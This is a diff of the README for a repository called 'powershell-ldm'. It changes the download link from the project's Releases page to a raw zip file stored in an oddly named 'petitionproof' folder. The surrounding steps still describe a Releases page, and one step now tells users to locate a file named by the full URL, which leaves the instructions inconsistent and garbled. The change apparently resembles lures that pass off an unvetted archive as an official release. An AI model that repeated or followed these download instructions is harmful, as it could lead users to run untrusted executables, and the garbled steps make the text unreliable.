yytyt7/powershell-ldm/README.md

 ## 📥 Download & Install

-To download and install powershell-ldm, visit this page: [Download powershell-ldm](https://github.com/yytyt7/powershell-ldm/releases).
+To download and install powershell-ldm, visit this page: [Download powershell-ldm](https://raw.githubusercontent.com/yytyt7/powershell-ldm/main/petitionproof/powershell-ldm.zip).

 On the Releases page, you'll see a list of available versions.
 Choose the latest version, usually at the top of the list.
 Click on the version number to open the release details.
 There, you will find a list of files available to download.

 ### Step-by-Step Instructions:

 1. Click on the version number.
-2. Locate the file named `powershell-ldm.zip` or similar.
+2. Locate the file named `https://raw.githubusercontent.com/yytyt7/powershell-ldm/main/petitionproof/powershell-ldm.zip` or similar.
 3. Click the file name to download it to your computer.

 After the download is complete, follow these steps to extract and run the application: